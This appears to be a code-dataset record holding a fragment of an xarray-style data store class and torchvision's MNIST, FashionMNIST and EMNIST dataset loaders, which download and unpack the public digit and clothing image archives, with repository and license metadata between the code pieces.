def set_attributes(self, attributes):
for k, v in iteritems(attributes):
self.set_attribute(k, v)
def set_variables(self, variables, check_encoding_set):
for vn, v in iteritems(variables):
name = _encode_variable_name(vn)
check = vn in check_encoding_set
target, source = self.prepare_variable(name, v, check)
self.writer.add(source, target)
def set_necessary_dimensions(self, variable):
for d, l in zip(variable.dims, variable.shape):
if d not in self.dimensions:
self.set_dimension(d, l)
class WritableCFDataStore(AbstractWritableDataStore):
def store(self, variables, attributes, check_encoding_set=frozenset()):
# All NetCDF files get CF encoded by default, without this attempting
# to write times, for example, would fail.
cf_variables, cf_attrs = cf_encoder(variables, attributes)
AbstractWritableDataStore.store(self, cf_variables, cf_attrs,
check_encoding_set)
|
jrdurrant/vision
|
torchvision/datasets/mnist.py
|
Python
|
bsd-3-clause
| 12,198
| 0.003771
|
from __future__ import print_function
import torch.utils.data as data
from PIL import Image
import os
import os.path
import errno
import numpy as np
import torch
import codecs
class MNIST(data.Dataset):
"""`MNIST <http://yann.lecun.com/exdb/mnist/>`_ Dataset.
Args:
root (string): Root directory of dataset where ``processed/training.pt``
and ``processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
urls = [
'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz',
'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz',
'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz',
'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz',
]
raw_folder = 'raw'
processed_folder = 'processed'
training_file = 'training.pt'
test_file = 'test.pt'
def __init__(self, root, train=True, transform=None, target_transform=None, download=False):
self.root = os.path.expanduser(root)
self.transform = transform
self.target_transform = target_transform
self.train = train # training set or test set
if download:
self.download()
if not self._check_exists():
raise RuntimeError('Dataset not found.' +
' You can use download=True to download it')
if self.train:
self.train_data, self.train_labels = torch.load(
os.path.join(self.root, self.processed_folder, self.training_file))
else:
self.test_data, self.test_labels = torch.load(
os.path.join(self.root, self.processed_folder, self.test_file))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
if self.train:
img, target = self.train_data[index], self.train_labels[index]
else:
img, target = self.test_data[index], self.test_labels[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
if self.train:
return len(self.train_data)
else:
return len(self.test_data)
def _check_exists(self):
return os.path.exists(os.path.join(self.root, self.processed_folder, self.training_file)) and \
os.path.exists(os.path.join(self.root, self.processed_folder, self.test_file))
def download(self):
"""Download the MNIST data if it doesn't exist in processed_folder already."""
from six.moves import urllib
import gzip
if self._check_exists():
return
# download files
try:
os.makedirs(os.path.join(self.root, self.raw_folder))
os.makedirs(os.path.join(self.root, self.processed_folder))
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
for url in self.urls:
print('Downloading ' + url)
data = urllib.request.urlopen(url)
filename = url.rpartition('/')[2]
file_path = os.path.join(self.root, self.raw_folder, filename)
with open(file_path, 'wb') as f:
f.write(data.read())
with open(file_path.replace('.gz', ''), 'wb') as out_f, \
gzip.GzipFile(file_path) as zip_f:
out_f.write(zip_f.read())
os.unlink(file_path)
# process and save as torch files
print('Processing...')
training_set = (
read_image_file(os.path.join(self.root, self.raw_folder, 'train-images-idx3-ubyte')),
read_label_file(os.path.join(self.root, self.raw_folder, 'train-labels-idx1-ubyte'))
)
test_set = (
read_image_file(os.path.join(self.root, self.raw_folder, 't10k-images-idx3-ubyte')),
read_label_file(os.path.join(self.root, self.raw_folder, 't10k-labels-idx1-ubyte'))
)
with open(os.path.join(self.root, self.processed_folder, self.training_file), 'wb') as f:
torch.save(training_set, f)
with open(os.path.join(self.root, self.processed_folder, self.test_file), 'wb') as f:
torch.save(test_set, f)
print('Done!')
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
tmp = 'train' if self.train is True else 'test'
fmt_str += ' Split: {}\n'.format(tmp)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
class FashionMNIST(MNIST):
"""`Fashion-MNIST <https://github.com/zalandoresearch/fashion-mnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``processed/training.pt``
and ``processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded,
|
it is not
downloaded again.
|
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
urls = [
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
]
class EMNIST(MNIST):
"""`EMNIST <https://www.nist.gov/itl/iad/image-group/emnist-dataset/>`_ Dataset.
Args:
root (string): Root directory of dataset where ``processed/training.pt``
and ``processed/test.pt`` exist.
split (string): The dataset has 6 different splits: ``byclass``, ``bymerge``,
``balanced``, ``letters``, ``digits`` and ``mnist``. This argument specifies
which one to use.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/tra
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.